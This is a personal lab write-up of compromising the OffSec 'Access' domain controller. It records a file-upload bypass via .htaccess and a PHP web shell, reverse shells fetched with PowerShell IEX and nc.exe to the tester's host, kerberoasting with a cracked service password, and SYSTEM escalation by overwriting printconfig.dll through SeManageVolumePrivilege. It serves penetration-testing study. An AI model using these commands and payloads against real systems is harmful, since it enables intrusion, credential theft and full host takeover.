โ™ฟAccess

Connect VPN before the starting the access machine in offsec(openvpn Downloads/universal\(1\).ovpn)

What will learn in this writeup

Information gathering and enumeration using nmap & gobuster
Exploiting file upload vulnerability using .htaccess.
Kerberos attacks on service accounts.
Active Directory Windows privielge escalation using SeManageVolumePrivilege

Enumeration

1.nmap 192.168.167.187 -sVC -A -p- --min-rate 10000

https://github.com/swisskyrepo/PayloadsAllTheThings

2.rustscan --addresses 192.168.167.187 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

https://github.com/swisskyrepo/PayloadsAllTheThings

The presence of ports 53 (DNS), 88 (Kerberos Authentication), and 389 (LDAP) immediately suggests that this is a Domain Controller.

Thereโ€™s an Apache web server running on port 80.

The usual SMB ports, 139 and 445, paired with port 5985, suggest potential Remote Management access.

Ports 636 (Secure LDAP) and 2369 are listed as โ€œtcpwrapped,โ€ which is unclear โ€” further information might be gained via a netcat banner grab or by re-running Nmap with the -T0 flag to slow the scan down.

Additionally, thereโ€™s an unknown .NET message framework on port 9389 and a range of Microsoft RPC ports.

dig any access.offsec @IP

dig axfr access.offsec @IP

dirbuster

dirb http://192.168.190.187/

Dirsearch

dirsearch -u http://192.168.167.187/ -w /wordlist/directory-list-lowercase-2.3-small.txt -e php,txt,html,htm,asp,aspx -o results.txt

dirsearch -u http://192.168.167.187/ -w /wordlist/raft-small-files-lowercaase.txt -o results.txt

curl

curl http://192.168.167.18/uploads/siren.evil?cmd-whoami

Port 88 - Kerberos

Port 88 is likely the Domain Controller, so we can query the DC for potential domain users that we can password spray later on.

kerbrute userenum -d access.offsec --dc 192.168.150.187 /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt

Port 139 - LDAP

We will identify the domain name and other general information about the domain by querying LDAP with ldapsearch

ldapsearch -H ldap://192.168.150.187 -x -s base -b '' "(objecClass=*)" "*"

And, we find some useful information, the domainsaccess.offsec and SERVER.access.offsec should be added to /etc/hosts.

SMB Enumeration

Since SMB is open, we can try listing shares with a null and guest session.

nxc smb access.offsec -u '' -p '' --shares

nxc smb access.offsec -u 'a' -p 'a' --shares

Initial Access

The entry points are likely via password spraying the domain controller or via the web application.

Web Portal Enumeration & Fuzzing

An Apache server (port 80) is running on this domain controller.

Meanwhile, we will perform a directory enumeration on the port in the background.

gobuster dir -u http://192.168.167.187/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

I have chosen 42 threads with -t 42 and to ignore codes that will not be useful to me now with -b 400, 403, 404.

Then add the domain name to our /etc/hosts file.

subl /etc/hosts

We could try a DNS zone transfer, a LDAPsearch (since we have the domain name), SMB enumeration with enum4linux and smbclient, but we are going to go the the Apache web server first.

Wappalyzer is a Firefox plugin useful to web application enumeration.

Letโ€™s try a PHP Ivan Sincek shell from https://www.revshells.com/ and https://github.com/flozz/p0wny-shell

Create simple php file

<pre>

<?php

system($_GET['cmd']);

?>

</pre>

This just hosts a webserver that delivers files from my current working directory, see: https://github.com/sc0tfree/updog

Enter the appropriate tun0 IP address and Iโ€™ll use port 135 since it is a SMB enabled Windows box. Copy the code into a text file, save it (shell.php), and browse to it.

There is a web application running on the Apache server that sells tickets.

If you scroll down the homepage, youโ€™ll notice that the site allows users to upload an image file during the ticket purchasing process.

There are a few potentially vulnerable form fields worth checking, but they donโ€™t lead anywhere until you click on one of the three โ€œBuy Nowโ€ buttons near the bottom. Since my goal is to go for the โ€˜Proโ€™ option, Iโ€™ll select that one.

The โ€œ/uploadsโ€ directory appears to be of interest and seems to be where usersโ€™ image uploads are stored. Letโ€™s confirm this assumption.

We are redirected and discover that they are wise to our ways. PHP is not allowed.

Initial Acces / File Upload Vulnerability

The server wouldnโ€™t accept any files with the โ€œ.phpโ€ extension, likely because itโ€™s on the serverโ€™s blocklist.

Interestingly, we discovered that while known script extensions like โ€œ.phpโ€ and โ€œ.php4โ€ were blocked, we were able to upload files with a custom extension, such as โ€œ.ttyโ€.

We uploaded the web shell as โ€œshell.tty,โ€ and the server accepted it.

Unfortunately, the server didnโ€™t execute the web shell due to the unrecognized extension. Instead, it simply displayed the source code of the file.

Noticing that the server is running Apache, we realized we could upload an โ€œ.htaccessโ€ file to instruct the server to treat the โ€œ.ttyโ€ extension as a PHP script.

Content of the .htaccess file

echo "AddType application/x-httpd-php .tty" > .htaccess

We are then shuffled back to the home page where we are free to try another file type. By exhaustion, we learn the none of the PHP type extensions will be accepted.

We create our own .htaccess file that outlines a NEW PHP file type and upload it.

https://thibaud-robin.fr/articles/bypass-filter-upload/ - Reference

echo "AddType application/x-httpd-php .dork" > .htaccess

Ref - https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass

Be aware that to be able to select this file for upload, you will have to change your view setting with a right-click after browsing to its location.Make sure the โ€œShow Hidden Filesโ€ box is checked

We received different popup message

Change the name of your shell.php file to end in the new PHP extension type.

Now we will be able to upload it. However, parallely we set up our listener first.

rlwrap nc -lnvp 135

I use rlwrap so that I retain use of my arrow key functionality upon connection.

Now we upload the shell.dork PHP file.

It is not denied and we receive that same positive popup as with the .htaccess file.nothing worked and now we will try gobuster

gobuster dir -u http://192.168.167.187/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

http://192.168.167.187/index.html http://192.168.167.187/uploads http://192.168.167.187/assets http://192.168.167.187/forms http://192.168.167.187/Index.html http://192.168.167.187/examples http://192.168.167.187/Forms http://192.168.167.187/Assets http://192.168.167.187/INDEX.html http://192.168.167.187/ticket.php http://192.168.167.187/Uploads http://192.168.167.187/FORMS http://192.168.167.187/Ticket.php

Option 2:

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.167.187:80/FUZZ

Click on our uploaded shell and notice that the browser hangs and will not resolve. This is promising. Check the listener.

will check the privileges by entering whoami /priv

1st we will get the local flag

C:\xampp>type passwords.txt

XAMPP Default Passwords

  1. MySQL (phpMyAdmin):

    User: root Password: (means no password!)

  2. FileZilla FTP:

    [ You have to create a new user on the FileZilla Interface ]

  3. Mercury (not in the USB & lite version):

    Postmaster: Postmaster (postmaster@localhost) Administrator: Admin (admin@localhost)

    User: newuser Password: wampp

  4. WEBDAV:

    User: xampp-dav-unsecure Password: ppmax2011 Attention: WEBDAV is not active since XAMPP Version 1.7.4. For activation please comment out the httpd-dav.conf and following modules in the httpd.conf

    LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so

    Please do not forget to refresh the WEBDAV authentication (users and passwords).

Another Option:

Arbitrary File Upload -> Foothold

I then decided to check whether I could upload a PHP web shell, and hopefully, I could run commands on the machine remotely. By the way, there are a lot of PHP web shells out there, and the one I used here is from

Logowwwolf-php-webshell/webshell.php at master ยท WhiteWinterWolf/wwwolf-php-webshellGitHub

However, the server doesn't seem to allow any file with the ".php" extension. The ".php" extension might be in the blocklist of the server.

I was able to upload files with my own extension such as ".xxx". Then I uploaded the web shell as "webshell.xxx" to the server and the server accepted it.

I tried to run the file in upload directory. It turned out the server didn't render the shell at all due to the unknown extension, it printed out the source code.

It can be noticed that the server running on the machine is apache. So we could potentially upload a ".htaccess" file to the directory to let the server render my ".xxx" extension as PHP script.Reference video https://www.youtube.com/watch?v=xZd1JWmLGLk

I made a ".htaccess" file and sent it to the server.

echo "AddType application/x-httpd-php .xxx" > .htaccess

The ".htaccess" file wasn't shown in the "/uploads" directory because it is a hidden file. But after uploading it, I could see the web shell we uploaded just now had been rendered. The server now renders the ".xxx" extension as PHP. And it allowed me to perform command execution.

Now to get a foothold on the machine.Run the webserver in kali machine and to use the powercat.ps1 in port 80

1.Identify the powercat.pst file in kali and if you are not able to identify in kali download from internet using below link - https://github.com/besimorhino/powercat

execute the command through the web shell to download the "powercat.ps1" with PowerShell and run the reverse shell command.

Parallely run netcat to get the reverse shell

rlwrap nc -nvlp 4444

Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.202/powercat.ps1');powercat -c 192.168.45.202 -p 4444 -e cmd

Once click execute we willl get the reverse shell

Lateral Movement (svc_apache -> svc_mssql)

The local.txt isn't in the "svc_apache" folder, and "svc_mssql" was not accessible to the current user. So I need to switch to "svc_mssql" laterally to get the flag.

Based on the naming convention, I assumed "svc_mssql" is a service account that can be requested tickets. But first, I need to get a list of service principal names of the machine, which I would use a PowerShell script to do that.

https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1

Download the above file in kali

wget https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1

Two ways we can download the files to victim machine

Option 1:

First set up your python web server on Kali.

Powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.45.202/Get-SPN.ps1','C:\Users\svc_apache\Desktop\Get-SPN.ps1')

Option 2:

First set up your python web server on Kali.

certutil -urlcache -split -f http://192.168.45.202/Get-SPN.ps1

Since it is a Powershell script, letโ€™s change shells on the victim machine and run the script.

powershell -ExecutionPolicy Bypass

.\Get-SPN.ps1

The SPN of the "MSSQL" object was now obtained: "MSSQLSvc/DC.access.offsec". The next step was to request the ticket from "svc_mssql" and get the hash from the ticket.

Object Name = krbtgt

DN = CN=krbtgt,CN=Users,DC=access,DC=offsec

Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames

SPN( 1 ) = kadmin/changepw

Object Name = MSSQL

DN = CN=MSSQL,CN=Users,DC=access,DC=offsec

Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames

SPN( 1 ) = MSSQLSvc/DC.access.offsec

To request the ticket, two commands can be executed to request and store the ticket in the memory.

The MSSQL service account will likely have better privileges. Now that we have the SPN, we are able to request a ticket and store it in memory with the end goal of getting its hash.

PS> Add-Type -AssemblyName System.IdentityModel

PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

To get the kerberoast hash of the ticker, "Invoke-Kerberoast.ps1" is needed to extract the hash from memory. - https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

First set up your python web server on Kali.

python -m SimpleHTTPServer 80

Run the script through the command: - this is giving some error will try other option

iex(new-object net.webclient).downloadString('http://192.168.45.202:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat

I saved the extracted hash to my kali local and was ready to crack it by "hashaccess".

Now crack it with either John the Ripper or Hashcat.

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hashaccess

Crack the "krb5tgs" hash through the command

hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt

john --format=krb5tgs hashaccess --wordlist=/usr/share/wordlists/rockyou.txt

hashcat -m 13100 --force -a 0 svc_mssql.hash /usr/share/wordlists/rockyou.txt

Try using different option nc.exe

1.create .htaccess file to bypass the file upload using our defined extension (.nkr) - AddType application/x-httpd-php .nkr

echo "AddType application/x-httpd-php .nkr" > .htaccess

2.create sample php file krampt.nkr

<pre>

<?php

system($_GET['cmd']);

?>

</pre>

3.upload both files and try to navigate

http://192.168.195.187/uploads/krampt.nkr?cmd=dir192.168.195.187

option 2

curl http://192.168.195.187/uploads/krampt.nkr?cmd=dir

Transfer nc.exe to victim machine

curl http://192.168.45.202/nc.exe

to upload nc.exe to victim machine to run the command

http://192.168.195.187/uploads/krampt.nkr?cmd=curl http://192.168.45.202/nc.exe -o .\nc.exe

taking reverse shell

http://192.168.158.187/uploads/krampt.nkr?cmd=.\nc.exe%20192.168.45.199%209090%20-e%20cmd.exe

Let us trabsfer the powerview.ps1

1.Enable the python webserver - python -m SimpleHTTPServer 80

2.Locate and copy the powerview.ps1 file

3.Now transfer the powerview.ps1 file to victim machine(access machine)

dir /a /o /q

Using PowerView to get more information.

C:\xampp\htdocs\uploads>powershell

PS C:\xampp\htdocs\uploads> import-module .\powerview.ps1

PS C:\xampp\htdocs\uploads> Get-netuser svc_mssql

If there is kerbrosting involved thing about tgs ticket and tgs is a KDC component with issues a service ticket then we can use rubeus.exe.

we need tgs ticket

locate the rubeus.exe and copy to victim server

PS C:\xampp\htdocs\uploads> curl http://192.168.45.199/Rubeus.exe -o .\Rubeus.exe

To Generate the Kerbroast token

PS C:\xampp\htdocs\uploads> .\Rubeus.exe kerberoast /nowrap

Copy and save the hashes in a file

Crack the hash using john

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

download and copy the Invoke-RunasCs.ps1 file to victim machine

curl http://192.168.45.199/Invoke-RunasCs.ps1 -o .\Invoke-RunasCs.ps1

PS C:\xampp\htdocs\uploads> Import-Module .\Invoke-RunasCs.ps1

.\Invoke-RunasCs.ps1 svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.199 5555 -e cmd.exe'

powershell -ep bypass -File .\Invoke-RunasCs.ps1 svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.199 4444 -e cmd.exe'

we will try another option RunasCs.exe

0B
RunasCs.exe
Open

curl http://192.168.45.199/RunasCs.exe -o RunasCs.exe

we will run this command in victim machine to take shell

.\RunasCs.exe svc_mssql trustno1 cmd.exe -r 192.168.45.199:8081

PS C:\users\public\temp> .\RunasCs.exe svc_mssql trustno1 cmd.exe -r 192.168.45.199:8081

Privilege escalation - to Get the root flag

Check the privileges using command whoami /priv

check netstat -ano - nothing we identified

we can try to use SeManageVolumePrivilege exploit.

0B
SeManageVolumeExploit.exe
Open

we will not be able to find the SeManageVolumeExploit.exe files in kali Linux so download the file using below link

LogoReleases ยท CsEnox/SeManageVolumeExploitGitHub

SeManageVolumePrivilege Privilege Escalation

The SeManageVolumePrivilege privilege in Windows allows a user to perform volume-related operations, such as defragmenting, mounting, or dismounting a volume. This privilege is normally restricted to highly privileged accounts, like Administrators.

Privilege Escalation via SeManageVolumePrivilege occurs when an attacker with this privilege gains access to the system and can exploit it to escalate their privileges further. Specifically, the attacker might use this privilege to:

Mount/Dismount Volumes: Attackers can mount volumes containing sensitive data, potentially bypassing access control mechanisms.

Corrupt or Manipulate File Systems: By interacting with file systems at the volume level, attackers could introduce malicious changes or corrupt files to create backdoors or disrupt system functionality.

Potential Code Execution: Depending on the volume operations allowed, attackers may trigger scenarios that lead to arbitrary code execution.

https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public

Copy the file from kali linux machine to victim mahine\

1.Start the python web server - python -m SimpleHTTPServer 80

2.Copy the file to victim machine using below command

certutil -urlcache -split -f "http://192.168.45.199/SeManageVolumeExploit.exe"

or

curl http://192.168.45.199/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

Run the tasklist to view the running tasks

Run the net start to view the started services

Run the command to view the systeminfo

C:\Users\Public>systeminfo

the system is patched however we wil try to run the command

.\SeManageVolumeExploit.exe

what is 921 entries changed -

wpcoreutil.dll - windoows insider service - we can overwrite to get the shell

Printconfig.dll - we can use

we can create payload using msfvenom

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.163 LPORT=1337 -f dll -o printconfig.dll

Copy the file to victim machine using below command

certutil -urlcache -split -f "http://192.168.45.163/printconfig.dll"

or

curl http://192.168.45.163/printconfig.dll -o printconfig.dll

We have to overwrite the copied DLL to below location C:\Windows\System32\spool\drivers\x64\3\

C:\Users\Public>copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\

POC - https://github.com/CsEnox/SeManageVolumeExploit

SeManageVolumeExploit

This exploit grants full permission on C:\ drive for all users on the machine.

Enables the privilege in the token
Creates handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545

Overwriting "Printconfig.dll" for SYSTEM Shell Access

The capacity to create a file under user control within protected directories opens up a multitude of possibilities for privilege escalation. One of the relatively straightforward techniques involves replacing the "Printconfig.dll" file situated at "C:\Windows\System32\spool\drivers\x64\3" with a malicious DLL. By initiating the PrintNotify object, the service will load our nefarious PrintConfig.dll, thereby granting us a privileged SYSTEM shell.

Proof of Concept:

Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Initiate the PrintNotify object by executing the following PowerShell commands:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}") $object = [Activator]::CreateInstance($type)

Attain a system shell access.

Start the powershell and run the below command and parallely start the listner

nc -nvlp 1337

PS C:\Users\Public> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")

PS C:\Users\Public> $object = [Activator]::CreateInstance($type)

got the reverse shell

whoami

PreviousHeistNextNagoya

Last updated

Was this helpful?